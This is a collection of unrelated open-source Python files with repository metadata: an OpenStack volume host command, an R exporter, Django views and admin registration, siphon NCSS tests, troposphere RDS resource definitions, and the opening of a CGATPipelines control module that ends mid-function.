        # Delegate to the cinder services API.
        volume_client = self.app.client_manager.volume
        volume_client.services.failover_host(
            parsed_args.host, parsed_args.volume_backend)
class SetVolumeHost(command.Command):
    _description = _("Set volume host properties")

    def get_parser(self, prog_name):
        p = super(SetVolumeHost, self).get_parser(prog_name)
        p.add_argument(
            "host",
            metavar="<host-name>",
            help=_("Name of volume host"),
        )
        # --enable and --disable are mutually exclusive states.
        state_group = p.add_mutually_exclusive_group()
        state_group.add_argument(
            "--disable",
            action="store_true",
            help=_("Freeze and disable the specified volume host"),
        )
        state_group.add_argument(
            "--enable",
            action="store_true",
            help=_("Thaw and enable the specified volume host"),
        )
        return p

    def take_action(self, parsed_args):
        volume_client = self.app.client_manager.volume
        if parsed_args.enable:
            volume_client.services.thaw_host(parsed_args.host)
        if parsed_args.disable:
            volume_client.services.freeze_host(parsed_args.host)
| {
"content_hash": "0cf813c3e256ee524922ba19f258ef5c",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 73,
"avg_line_length": 33.47540983606557,
"alnum_prop": 0.5861900097943193,
"repo_name": "openstack/python-openstackclient",
"id": "2fdeb9684b96812e010ac57c228dccc12ce9c067",
"size": "2610",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "openstackclient/volume/v2/volume_host.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "923"
},
{
"name": "Python",
"bytes": "5016301"
},
{
"name": "Shell",
"bytes": "299"
}
],
"symlink_target": ""
} |
from zipfile import ZipFile
from cStringIO import StringIO
from string import punctuation
from django.template import Context
from django.template.loader import get_template
from _base import BaseExporter
from _csv import CSVExporter
class RExporter(BaseExporter):
    """Export data as a zip archive containing a CSV data file and an R
    script that loads the data, labels the columns, and recodes coded
    fields as R factors with human-readable levels.
    """
    short_name = 'R'
    long_name = 'R Programming Language'
    file_extension = 'zip'
    content_type = 'application/zip'
    preferred_formats = ('r', 'coded')

    def _format_name(self, name):
        """Sanitize ``name`` into a valid R identifier: drop punctuation
        (except underscores), camelCase on word boundaries, and prefix an
        underscore when the result would start with a digit."""
        punc = punctuation.replace('_', '')
        name = str(name).translate(None, punc)
        name = name.replace(' ', '_')
        words = name.split('_')
        for i, w in enumerate(words):
            if i == 0:
                name = w.lower()
                continue
            name += w.capitalize()
        # Guard against an empty result before indexing the first character.
        if name and name[0].isdigit():
            name = '_' + name
        return name

    def _code_values(self, var, coded_labels):
        """Return a (factor, level) pair of R statements that recode
        ``data$<var>`` using the (code, label) pairs in ``coded_labels``."""
        data_field = u'data${0}'.format(var)
        factor = u'{0}.factor = factor({0},levels=c('.format(data_field)
        level = u'levels({0}.factor)=c('.format(data_field)
        last = len(coded_labels) - 1
        for i, (code, label) in enumerate(coded_labels):
            factor += str(code)
            level += u'"{0}"'.format(str(label))
            # Do not apply the separator after the final element.
            if i < last:
                factor += ' ,'
                level += ' ,'
        factor += '))\n'
        level += ')\n'
        return factor, level

    def write(self, iterable, buff=None, template_name='export/script.R',
              *args, **kwargs):
        """Write the zip archive (data.csv + script.R) for ``iterable`` and
        return the closed ZipFile object."""
        zip_file = ZipFile(self.get_file_obj(buff), 'w')
        factors = []  # R factor() statements for coded fields
        levels = []   # matching levels() statements
        labels = []   # attr(..., "label") statements for every column
        for f in self.header:
            name = f['name']
            labels.append(u'attr(data${0}, "label") = "{1}"'
                          .format(name, f['label']))
            coded_labels = f['field'].coded_labels()
            if coded_labels:
                # BUG FIX: the call previously passed f['field'] as an extra
                # positional argument, which raised TypeError since
                # _code_values() only takes the variable name and the
                # coded labels.
                codes = self._code_values(name, coded_labels)
                factors.append(codes[0])
                levels.append(codes[1])
        data_filename = 'data.csv'
        script_filename = 'script.R'
        # File buffers
        data_buff = StringIO()
        # Create the data file with this exporter's preferred formats.
        data_exporter = CSVExporter(self.concepts,
                                    preferred_formats=self.preferred_formats)
        # Write the data file.
        data_exporter.write(iterable, data_buff, *args, **kwargs)
        zip_file.writestr(data_filename, data_buff.getvalue())
        template = get_template(template_name)
        context = Context({
            'data_filename': data_filename,
            'labels': labels,
            'factors': factors,
            'levels': levels,
        })
        # Write script from template
        zip_file.writestr(script_filename, template.render(context))
        zip_file.close()
        return zip_file
| {
"content_hash": "43163230ad8235cb2b2c69162f746b35",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 77,
"avg_line_length": 28.761467889908257,
"alnum_prop": 0.5400318979266348,
"repo_name": "murphyke/avocado",
"id": "12af63a9d730839259076282f9127ef2b30ba1aa",
"size": "3135",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "avocado/export/_r.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "18009"
},
{
"name": "Makefile",
"bytes": "84"
},
{
"name": "Python",
"bytes": "1035156"
},
{
"name": "R",
"bytes": "273"
},
{
"name": "SAS",
"bytes": "689"
},
{
"name": "Shell",
"bytes": "2369"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import Category, Thread, Post
# Expose the forum models in the Django admin with default ModelAdmin options.
admin.site.register(Category)
admin.site.register(Thread)
admin.site.register(Post)
| {
"content_hash": "8c88ff1301424b61c4bb1fd87d07992f",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 42,
"avg_line_length": 23.142857142857142,
"alnum_prop": 0.808641975308642,
"repo_name": "maur1th/naxos",
"id": "abf989f1c0dc6a52e0f1f6807bccc656e0e04fe3",
"size": "162",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/forum/forum/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3190"
},
{
"name": "Dockerfile",
"bytes": "1231"
},
{
"name": "HTML",
"bytes": "130330"
},
{
"name": "JavaScript",
"bytes": "9078"
},
{
"name": "Python",
"bytes": "132947"
},
{
"name": "Shell",
"bytes": "458"
}
],
"symlink_target": ""
} |
"""Test NCSS access code."""
from contextlib import contextmanager
from datetime import datetime
import numpy as np
from siphon.ncss import NCSS, NCSSQuery, ResponseRegistry
import siphon.testing
recorder = siphon.testing.get_recorder(__file__)
def test_ncss_query_proj_box():
    """Test forming a query with a projected bounding box."""
    box_query = NCSSQuery().lonlat_point(1, 2).projection_box(-1, -2, -3, -4)
    query_str = str(box_query)
    # Exactly the four bounding-box parameters should be present.
    assert query_str.count('=') == 4
    for expected_param in ('minx=-1', 'miny=-2', 'maxx=-3', 'maxy=-4'):
        assert expected_param in query_str
def test_ncss_query_vertical_level():
    """Test making a query with a vertical level."""
    level_query = NCSSQuery().vertical_level(50000)
    assert str(level_query) == 'vertCoord=50000'
def test_ncss_query_add_latlon():
    """Test query when requesting adding lon and lat."""
    latlon_query = NCSSQuery().add_lonlat(True)
    assert str(latlon_query) == 'addLatLon=True'
def test_ncss_query_strides():
    """Test making a query with strides."""
    stride_query = str(NCSSQuery().strides(5, 10))
    for expected_param in ('timeStride=5', 'horizStride=10'):
        assert expected_param in stride_query
def test_ncss_query_accept():
    """Test making a query with an accept."""
    accept_query = NCSSQuery().accept('csv')
    assert str(accept_query) == 'accept=csv'
@contextmanager
def response_context():
    """Override the response handler registry for testing.

    This way we can force unhandled cases.
    """
    old_reg = siphon.ncss.response_handlers
    siphon.ncss.response_handlers = ResponseRegistry()
    try:
        yield siphon.ncss.response_handlers
    finally:
        # BUG FIX: restore the real registry even when the caller's block
        # raises; previously an exception left the fake registry installed
        # and poisoned every later test.
        siphon.ncss.response_handlers = old_reg
# For testing unit handling
def tuple_unit_handler(data, units=None):
    """Return data as a list, with units as necessary."""
    values = np.asarray(data).tolist()
    return values, units
class TestNCSS:
    """Test NCSS queries and response parsing."""

    server = 'http://thredds.ucar.edu/thredds/ncss/'
    url_path = 'grib/NCEP/GFS/Global_0p5deg/GFS_Global_0p5deg_20150612_1200.grib2'

    @recorder.use_cassette('ncss_test_metadata')
    def setup(self):
        """Set up for tests with a default valid query."""
        when = datetime(2015, 6, 12, 15, 0, 0)
        self.ncss = NCSS(self.server + self.url_path)
        self.nq = self.ncss.query().lonlat_point(-105, 40).time(when)
        self.nq.variables('Temperature_isobaric', 'Relative_humidity_isobaric')

    def _check_point_return(self, data):
        """Shared checks for a dict-like point return."""
        assert 'Temperature_isobaric' in data
        assert 'Relative_humidity_isobaric' in data
        assert data['lat'][0] == 40
        assert data['lon'][0] == -105

    def _check_units_tuple(self, data):
        """Shared checks for data processed by tuple_unit_handler."""
        temp = data['Temperature_isobaric']
        assert len(temp) == 2
        assert temp[1] == 'K'
        relh = data['Relative_humidity_isobaric']
        assert len(relh) == 2
        assert relh[1] == '%'

    def test_good_query(self):
        """Test that a good query is properly validated."""
        assert self.ncss.validate_query(self.nq)

    def test_bad_query(self):
        """Test that a query with an unknown variable is invalid."""
        self.nq.variables('foo')
        assert not self.ncss.validate_query(self.nq)

    def test_empty_query(self):
        """Test that an empty query is invalid."""
        res = self.ncss.validate_query(self.ncss.query())
        assert not res
        assert not isinstance(res, set)

    def test_bad_query_no_vars(self):
        """Test that a query without variables is invalid."""
        self.nq.var.clear()
        assert not self.ncss.validate_query(self.nq)

    @recorder.use_cassette('ncss_gfs_xml_point')
    def test_xml_point(self):
        """Test parsing XML point returns."""
        self.nq.accept('xml')
        self._check_point_return(self.ncss.get_data(self.nq))

    @recorder.use_cassette('ncss_gfs_csv_point')
    def test_csv_point(self):
        """Test parsing CSV point returns."""
        self.nq.accept('csv')
        self._check_point_return(self.ncss.get_data(self.nq))

    @recorder.use_cassette('ncss_gfs_csv_point')
    def test_unit_handler_csv(self):
        """Test unit-handling from CSV returns."""
        self.nq.accept('csv')
        self.ncss.unit_handler = tuple_unit_handler
        self._check_units_tuple(self.ncss.get_data(self.nq))

    @recorder.use_cassette('ncss_gfs_xml_point')
    def test_unit_handler_xml(self):
        """Test unit-handling from XML returns."""
        self.nq.accept('xml')
        self.ncss.unit_handler = tuple_unit_handler
        self._check_units_tuple(self.ncss.get_data(self.nq))

    @recorder.use_cassette('ncss_gfs_netcdf_point')
    def test_netcdf_point(self):
        """Test handling of netCDF point returns."""
        self.nq.accept('netcdf')
        nc = self.ncss.get_data(self.nq)
        assert 'Temperature_isobaric' in nc.variables
        assert 'Relative_humidity_isobaric' in nc.variables
        assert nc.variables['latitude'][0] == 40
        assert nc.variables['longitude'][0] == -105

    @recorder.use_cassette('ncss_gfs_netcdf4_point')
    def test_netcdf4_point(self):
        """Test handling of netCDF4 point returns."""
        self.nq.accept('netcdf4')
        nc = self.ncss.get_data(self.nq)
        assert 'Temperature_isobaric' in nc.variables
        assert 'Relative_humidity_isobaric' in nc.variables
        assert nc.variables['latitude'][0] == 40
        assert nc.variables['longitude'][0] == -105

    @recorder.use_cassette('ncss_gfs_vertical_level')
    def test_vertical_level(self):
        """Test data return from a single vertical level is correct."""
        self.nq.accept('csv').vertical_level(50000)
        csv_data = self.ncss.get_data(self.nq)
        np.testing.assert_almost_equal(csv_data['Temperature_isobaric'], np.array([263.40]), 2)

    @recorder.use_cassette('ncss_gfs_csv_point')
    def test_raw_csv(self):
        """Test CSV point return from a GFS request."""
        self.nq.accept('csv')
        assert self.ncss.get_data_raw(self.nq).startswith(b'date,lat')

    @recorder.use_cassette('ncss_gfs_csv_point')
    def test_unknown_mime(self):
        """Test handling of unknown mimetypes."""
        self.nq.accept('csv')
        with response_context():
            csv_data = self.ncss.get_data(self.nq)
            assert csv_data.startswith(b'date,lat')
| {
"content_hash": "b9fbcff14054feaecccd4721eb105264",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 95,
"avg_line_length": 33.315,
"alnum_prop": 0.6307969383160739,
"repo_name": "Unidata/siphon",
"id": "77e871fcb4c486a3b27aaafd6d56526fe3194042",
"size": "6809",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_ncss.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "355237"
}
],
"symlink_target": ""
} |
from django.shortcuts import render, redirect
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.utils.translation import ugettext as _
from django.core.mail import send_mail
from . import forms
def home(request):
    """
    Render the home page of the application.

    **Context**

    **Template**

    :template:`index.html`
    """
    return render(request, 'index.html', {})
def workshop(request):
    """
    Navigates to the workshop page of the application.

    **Context**

    **Template**

    :template:`workshop.html`
    """
    context = {}
    return render(request, 'workshop.html', context)
@login_required
def submit_feedback(request):
    """Display the feedback form and email submitted feedback.

    On a valid POST the feedback is mailed to ``settings.ADMIN_EMAIL``
    and a fresh form is rendered with a confirmation notice.  On GET,
    if a ``next`` query parameter is present and the user is already
    authenticated, the user is redirected there instead.
    """
    if request.method == 'POST':
        form = forms.SubmitFeedbackForm(request.POST)
        if form.is_valid():
            send_mail(
                form.cleaned_data.get('feedback_reason'),
                "Feedback sent from user: " + request.user.email + "\n" + form.cleaned_data.get('feedback'),
                'admin@ceos-cube.org', [settings.ADMIN_EMAIL],
                fail_silently=False)
            # Replace the bound form with a fresh one and surface a
            # confirmation via the form's non-field message area.
            form = forms.SubmitFeedbackForm()
            form.cleaned_data = {}
            # Fixed user-facing typo: "successfuly" -> "successfully".
            form.add_error(None, 'Feedback was successfully submitted. Thank you for your comments')
        context = {'title': "Feedback", 'form': form, 'wide': True}
        return render(request, 'submit_feedback.html', context)
    else:
        context = {'title': "Feedback", 'form': forms.SubmitFeedbackForm(), 'wide': True}
        if request.GET:
            # Renamed from 'next' to avoid shadowing the builtin.
            next_url = request.GET.get('next', "/")
            if request.user.is_authenticated():
                return redirect(next_url)
            context['next'] = next_url
        return render(request, 'submit_feedback.html', context)
| {
"content_hash": "35b1e9a3025079f74d27e3c030323583",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 108,
"avg_line_length": 28.106060606060606,
"alnum_prop": 0.6226415094339622,
"repo_name": "ceos-seo/data_cube_ui",
"id": "c4d5d2a0fc1e59aebc4a7c294b5d9eec0e418e8e",
"size": "1855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/pages/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "402543"
},
{
"name": "GLSL",
"bytes": "167522"
},
{
"name": "HTML",
"bytes": "8002318"
},
{
"name": "JavaScript",
"bytes": "46178533"
},
{
"name": "PHP",
"bytes": "28128"
},
{
"name": "PLSQL",
"bytes": "14578"
},
{
"name": "Python",
"bytes": "908507"
},
{
"name": "Shell",
"bytes": "21979"
},
{
"name": "TSQL",
"bytes": "31758"
}
],
"symlink_target": ""
} |
import re
from . import AWSHelperFn, AWSObject, AWSProperty, Ref
from .validators import boolean, network_port, integer, positive_integer
# Taken from:
# http://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBInstance.html
VALID_STORAGE_TYPES = ('standard', 'gp2', 'io1')
VALID_DB_ENGINES = ('MySQL', 'oracle-se1', 'oracle-se', 'oracle-ee',
'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex',
'sqlserver-web', 'postgres')
VALID_LICENSE_MODELS = ('license-included', 'bring-your-own-license',
'general-public-license')
def validate_iops(iops):
    """DBInstance Iops validation rules."""
    iops = integer(iops)
    value = int(iops)
    if value < 1000:
        raise ValueError("DBInstance Iops, if set, must be greater than 1000.")
    if value > 10000:
        raise ValueError("DBInstance Iops, if set, must be less than 10000.")
    return iops
def validate_storage_type(storage_type):
    """Validate StorageType for DBInstance"""
    if storage_type in VALID_STORAGE_TYPES:
        return storage_type
    raise ValueError("DBInstance StorageType must be one of: %s" %
                     ", ".join(VALID_STORAGE_TYPES))
def validate_engine(engine):
    """Validate database Engine for DBInstance """
    if engine in VALID_DB_ENGINES:
        return engine
    raise ValueError("DBInstance Engine must be one of: %s" %
                     ", ".join(VALID_DB_ENGINES))
def validate_license_model(license_model):
    """Validate LicenseModel for DBInstance"""
    if license_model in VALID_LICENSE_MODELS:
        return license_model
    raise ValueError("DBInstance LicenseModel must be one of: %s" %
                     ", ".join(VALID_LICENSE_MODELS))
def validate_backup_window(window):
    """Validate PreferredBackupWindow for DBInstance.

    The window must be in the format ``hh24:mi-hh24:mi`` and span at
    least 30 minutes.  Windows that cross midnight (e.g. ``23:50-00:20``)
    are measured across the day boundary.
    """
    hour = r'[01]?[0-9]|2[0-3]'
    minute = r'[0-5][0-9]'
    # Anchored at the end ($) so trailing garbage is rejected; re.match
    # already anchors the start.
    r = ("(?P<start_hour>%s):(?P<start_minute>%s)-"
         "(?P<end_hour>%s):(?P<end_minute>%s)$") % (hour, minute, hour, minute)
    range_regex = re.compile(r)
    m = range_regex.match(window)
    if not m:
        raise ValueError("DBInstance PreferredBackupWindow must be in the "
                         "format: hh24:mi-hh24:mi")
    start_ts = (int(m.group('start_hour')) * 60) + int(m.group('start_minute'))
    end_ts = (int(m.group('end_hour')) * 60) + int(m.group('end_minute'))
    # Measure the duration modulo one day so windows wrapping midnight
    # are handled; the previous abs() accepted wrapped windows shorter
    # than 30 minutes (e.g. 23:50-00:00).
    if (end_ts - start_ts) % (24 * 60) < 30:
        raise ValueError("DBInstance PreferredBackupWindow must be at least "
                         "30 minutes long.")
    return window
def validate_maintenance_window(window):
    """Validate PreferredMaintenanceWindow for DBInstance.

    The window must be in the format ``ddd:hh24:mi-ddd:hh24:mi`` with
    valid day abbreviations and must span at least 30 minutes.  Windows
    that wrap past the end of the week (e.g. ``Sun:23:50-Mon:00:20``)
    are measured across the week boundary.
    """
    days = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")
    day_re = r'[A-Z]{1}[a-z]{2}'
    hour = r'[01]?[0-9]|2[0-3]'
    minute = r'[0-5][0-9]'
    # Anchored at the end ($) so trailing garbage is rejected; re.match
    # already anchors the start.
    r = ("(?P<start_day>%s):(?P<start_hour>%s):(?P<start_minute>%s)-"
         "(?P<end_day>%s):(?P<end_hour>%s):(?P<end_minute>%s)$") % (day_re,
                                                                    hour,
                                                                    minute,
                                                                    day_re,
                                                                    hour,
                                                                    minute)
    range_regex = re.compile(r)
    m = range_regex.match(window)
    if not m:
        raise ValueError("DBInstance PreferredMaintenanceWindow must be in "
                         "the format: ddd:hh24:mi-ddd:hh24:mi")
    if m.group('start_day') not in days or m.group('end_day') not in days:
        raise ValueError("DBInstance PreferredMaintenanceWindow day part of "
                         "ranges must be one of: %s" % ", ".join(days))
    start_ts = (days.index(m.group('start_day')) * 24 * 60) + \
        (int(m.group('start_hour')) * 60) + int(m.group('start_minute'))
    end_ts = (days.index(m.group('end_day')) * 24 * 60) + \
        (int(m.group('end_hour')) * 60) + int(m.group('end_minute'))
    # Measure the duration modulo one week so windows wrapping Sun->Mon
    # are handled; the previous abs() accepted wrapped windows shorter
    # than 30 minutes.
    if (end_ts - start_ts) % (7 * 24 * 60) < 30:
        raise ValueError("DBInstance PreferredMaintenanceWindow must be at "
                         "least 30 minutes long.")
    return window
def validate_backup_retention_period(days):
    """Validate BackupRetentionPeriod for DBInstance"""
    days = positive_integer(days)
    if int(days) <= 35:
        return days
    raise ValueError("DBInstance BackupRetentionPeriod cannot be larger "
                     "than 35 days.")
class DBInstance(AWSObject):
    """``AWS::RDS::DBInstance`` CloudFormation resource.

    ``validate`` enforces several inter-property constraints before
    template generation so that errors surface locally rather than at
    stack-creation time.
    """
    resource_type = "AWS::RDS::DBInstance"
    # NOTE(review): validate_storage_type and validate_maintenance_window
    # are defined in this module but not wired in below ('StorageType'
    # and 'PreferredMaintenanceWindow' use plain basestring) -- confirm
    # whether that is intentional.
    props = {
        'AllocatedStorage': (positive_integer, True),
        'AllowMajorVersionUpgrade': (boolean, False),
        'AutoMinorVersionUpgrade': (boolean, False),
        'AvailabilityZone': (basestring, False),
        'BackupRetentionPeriod': (validate_backup_retention_period, False),
        'CharacterSetName': (basestring, False),
        'DBInstanceClass': (basestring, True),
        'DBInstanceIdentifier': (basestring, False),
        'DBName': (basestring, False),
        'DBParameterGroupName': (basestring, False),
        'DBSecurityGroups': (list, False),
        'DBSnapshotIdentifier': (basestring, False),
        'DBSubnetGroupName': (basestring, False),
        'Engine': (validate_engine, True),
        'EngineVersion': (basestring, False),
        'Iops': (validate_iops, False),
        'KmsKeyId': (basestring, False),
        'LicenseModel': (validate_license_model, False),
        'MasterUsername': (basestring, False),
        'MasterUserPassword': (basestring, False),
        'MultiAZ': (boolean, False),
        'OptionGroupName': (basestring, False),
        'Port': (network_port, False),
        'PreferredBackupWindow': (validate_backup_window, False),
        'PreferredMaintenanceWindow': (basestring, False),
        'PubliclyAccessible': (boolean, False),
        'SourceDBInstanceIdentifier': (basestring, False),
        'StorageEncrypted': (boolean, False),
        'StorageType': (basestring, False),
        'Tags': (list, False),
        'VPCSecurityGroups': ([basestring, AWSHelperFn], False),
    }
    def validate(self):
        """Check cross-property constraints; return True or raise ValueError."""
        # Read replicas inherit these settings from the source instance,
        # so they may not be combined with SourceDBInstanceIdentifier.
        if 'SourceDBInstanceIdentifier' in self.properties:
            invalid_replica_properties = (
                'BackupRetentionPeriod', 'DBName', 'MasterUsername',
                'MasterUserPassword', 'PreferredBackupWindow', 'MultiAZ',
                'DBSnapshotIdentifier', 'DBSubnetGroupName',
            )
            invalid_properties = [s for s in self.properties.keys() if
                                  s in invalid_replica_properties]
            if invalid_properties:
                raise ValueError(
                    ('{0} properties can\'t be provided when '
                     'SourceDBInstanceIdentifier is present '
                     'AWS::RDS::DBInstance.'
                     ).format(', '.join(sorted(invalid_properties))))
        # Credentials are only optional when restoring from a snapshot or
        # creating a read replica.
        if ('DBSnapshotIdentifier' not in self.properties and
            'SourceDBInstanceIdentifier' not in self.properties) and \
            ('MasterUsername' not in self.properties or
             'MasterUserPassword' not in self.properties):
            raise ValueError(
                'Either (MasterUsername and MasterUserPassword) or'
                ' DBSnapshotIdentifier are required in type '
                'AWS::RDS::DBInstance.'
            )
        # A custom KMS key only makes sense with encryption enabled.
        if 'KmsKeyId' in self.properties and \
           'StorageEncrypted' not in self.properties:
            raise ValueError(
                'If KmsKeyId is provided, StorageEncrypted is required '
                'AWS::RDS::DBInstance.'
            )
        nonetype = type(None)
        avail_zone = self.properties.get('AvailabilityZone', None)
        multi_az = self.properties.get('MultiAZ', None)
        # Skip this check when either value is an intrinsic function
        # (AWSHelperFn) whose result is only known at deploy time.
        if not (isinstance(avail_zone, (AWSHelperFn, nonetype)) and
                isinstance(multi_az, (AWSHelperFn, nonetype))):
            if 'AvailabilityZone' in self.properties and \
               self.properties.get('MultiAZ', None):
                raise ValueError("AvailabiltyZone cannot be set on "
                                 "DBInstance if MultiAZ is set to true.")
        # Provisioned-IOPS storage requires an explicit Iops value.
        storage_type = self.properties.get('StorageType', None)
        if storage_type and storage_type == 'io1' and \
                'Iops' not in self.properties:
            raise ValueError("Must specify Iops if using StorageType io1")
        # Iops constraints: minimum allocated storage and maximum
        # Iops-to-storage ratio of 10:1.
        allocated_storage = self.properties.get('AllocatedStorage')
        iops = self.properties.get('Iops', None)
        if iops:
            if not isinstance(allocated_storage, AWSHelperFn) and \
                    allocated_storage < 100:
                raise ValueError("AllocatedStorage must be at least 100 when "
                                 "Iops is set.")
            if not isinstance(allocated_storage, AWSHelperFn) and not \
                    isinstance(iops, AWSHelperFn) and \
                    float(iops) / float(allocated_storage) > 10.0:
                raise ValueError("AllocatedStorage must be no less than "
                                 "1/10th the provisioned Iops")
        return True
class DBParameterGroup(AWSObject):
    """``AWS::RDS::DBParameterGroup`` CloudFormation resource."""
    resource_type = "AWS::RDS::DBParameterGroup"
    props = {
        'Description': (basestring, False),
        'Family': (basestring, False),
        'Parameters': (dict, False),
        'Tags': (list, False),
    }
class DBSubnetGroup(AWSObject):
    """``AWS::RDS::DBSubnetGroup`` CloudFormation resource."""
    resource_type = "AWS::RDS::DBSubnetGroup"
    props = {
        'DBSubnetGroupDescription': (basestring, True),
        'SubnetIds': (list, True),
        'Tags': (list, False),
    }
class RDSSecurityGroup(AWSProperty):
    """Ingress rule sub-property used by DBSecurityGroup."""
    props = {
        'CIDRIP': (basestring, False),
        'EC2SecurityGroupId': (basestring, False),
        'EC2SecurityGroupName': (basestring, False),
        'EC2SecurityGroupOwnerId': (basestring, False),
    }
class DBSecurityGroup(AWSObject):
    """``AWS::RDS::DBSecurityGroup`` CloudFormation resource."""
    resource_type = "AWS::RDS::DBSecurityGroup"
    props = {
        'EC2VpcId': (basestring, False),
        'DBSecurityGroupIngress': (list, True),
        'GroupDescription': (basestring, True),
        'Tags': (list, False),
    }
class DBSecurityGroupIngress(AWSObject):
    """``AWS::RDS::DBSecurityGroupIngress`` CloudFormation resource."""
    resource_type = "AWS::RDS::DBSecurityGroupIngress"
    props = {
        'CIDRIP': (basestring, False),
        'DBSecurityGroupName': (basestring, True),
        'EC2SecurityGroupId': (basestring, False),
        'EC2SecurityGroupName': (basestring, False),
        'EC2SecurityGroupOwnerId': (basestring, False),
    }
class EventSubscription(AWSObject):
    """``AWS::RDS::EventSubscription`` CloudFormation resource."""
    resource_type = "AWS::RDS::EventSubscription"
    props = {
        'Enabled': (boolean, False),
        'EventCategories': ([basestring], False),
        'SnsTopicArn': (basestring, True),
        'SourceIds': ([basestring, Ref], False),
        'SourceType': (basestring, False),
    }
class OptionSetting(AWSProperty):
    """Name/value setting sub-property used by OptionConfiguration."""
    props = {
        'Name': (basestring, False),
        'Value': (basestring, False),
    }
class OptionConfiguration(AWSProperty):
    """Option configuration sub-property used by OptionGroup."""
    props = {
        'DBSecurityGroupMemberships': ([basestring, Ref], False),
        'OptionName': (basestring, True),
        'OptionSettings': ([OptionSetting], False),
        'Port': (network_port, False),
        'VpcSecurityGroupMemberships': ([basestring, Ref], False),
    }
class OptionGroup(AWSObject):
    """``AWS::RDS::OptionGroup`` CloudFormation resource."""
    resource_type = "AWS::RDS::OptionGroup"
    props = {
        'EngineName': (basestring, True),
        'MajorEngineVersion': (basestring, True),
        'OptionGroupDescription': (basestring, True),
        'OptionConfigurations': ([OptionConfiguration], True),
        'Tags': (list, False),
    }
| {
"content_hash": "b61e2fc0f4fdbfd8baa142328f2ed400",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 84,
"avg_line_length": 37.60576923076923,
"alnum_prop": 0.5804142163129634,
"repo_name": "ptoraskar/troposphere",
"id": "02994916ce136d36dad102033d468b11d4946026",
"size": "11844",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "troposphere/rds.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "174129"
}
],
"symlink_target": ""
} |
"""Control.py - Command line control for ruffus pipelines
=========================================================
The functions :func:`writeConfigFiles`, :func:`clean`,
:func:`clonePipeline` and :func:`peekParameters` provide the
functionality for particular pipeline commands.
:class:`MultiLineFormatter` improves the formatting
of long log messages, while
:class:`LoggingFilterRabbitMQ` intercepts ruffus log
messages and sends event information to a rabbitMQ message exchange
for task process monitoring.
Reference
---------
"""
import inspect
import json
import logging
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import io
import glob
import fnmatch
from multiprocessing.pool import ThreadPool
# talking to RabbitMQ
try:
import pika
HAS_PIKA = True
except ImportError:
HAS_PIKA = False
# talking to a cluster
try:
import drmaa
HAS_DRMAA = True
except RuntimeError:
HAS_DRMAA = False
from ruffus import pipeline_printout_graph, pipeline_printout, \
pipeline_run, ruffus_exceptions, task
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
from CGAT import Requirements as Requirements
from CGATPipelines.Pipeline.Utils import isTest, getCaller, getCallerLocals
from CGATPipelines.Pipeline.Execution import execute, startSession,\
closeSession
from CGATPipelines.Pipeline.Local import getProjectName, getPipelineName
from CGATPipelines.Pipeline.Parameters import inputValidation
# Set from Pipeline.py
PARAMS = {}
# global options and arguments - set but currently not
# used as relevant sections are entered into the PARAMS
# dictionary. Could be deprecated and removed.
GLOBAL_OPTIONS, GLOBAL_ARGS = None, None
def writeConfigFiles(pipeline_path, pipeline_path_2, general_path):
    '''create default configuration files in `path`.

    Searches `pipeline_path`, `pipeline_path_2` and `general_path` for
    exactly one ``pipeline*ini`` file and copies it into the current
    directory, then creates a ``pipeline_report`` directory and copies
    Sphinx / CGATReport configuration files (``conf.py``, optional
    sphinx-quickstart skeleton files, and a ``report_pipeline_*.rst``
    template) into it when they can be found.

    Raises
    ------
    ValueError
        If no (or more than one) ``pipeline*ini`` file is found across
        the three directories, or if the ini file cannot be copied.
    '''
    # TO DO: I've modified this function with workarounds to make it more
    # flexible in order to find an ini file, find a configuration dir and
    # copy pre-run sphinx-quickstart files if they exist.
    # Other than creating a 'report' dir, it should not change the way it is
    # run from CGATPipelines.
    # See also bottom of script for changes when calling the 'config' option
    # Antonio
    paths = [pipeline_path, pipeline_path_2, general_path]
    report_dir = 'pipeline_report'
    # NOTE(review): os.mkdir raises OSError if 'pipeline_report' already
    # exists -- presumably 'config' is only run once per project dir; confirm.
    os.mkdir(report_dir) # Sphinx config files will be copied here
    # CGATReport only needs its conf.py to generate the rest
    # though
    # Look for ini file:
    f_count = 0
    for path in paths:
        if os.path.exists(path):
            for f in os.listdir(os.path.abspath(path)):
                if fnmatch.fnmatch(f, 'pipeline*ini'):
                    f_count += 1
                    INI_file = f
    if f_count == 1:
        config_files = [INI_file] # This is for the pipeline only
    else:
        # Zero matches or several matches are both fatal.
        raise ValueError('''You have no project configuration (".ini") file
or more than one in the directories:
{}
{}
or
{}'''.format(pipeline_path, pipeline_path_2, general_path)
                         )
    # Copy pipeline ini file:
    for dest in config_files:
        if os.path.exists(dest):
            E.warn("file `%s` already exists - skipped" % dest)
            continue
        for path in paths:
            src = os.path.join(path, dest)
            if os.path.exists(src):
                shutil.copyfile(src, dest)
                E.info("created new configuration file `%s` " % dest)
                break
        else:
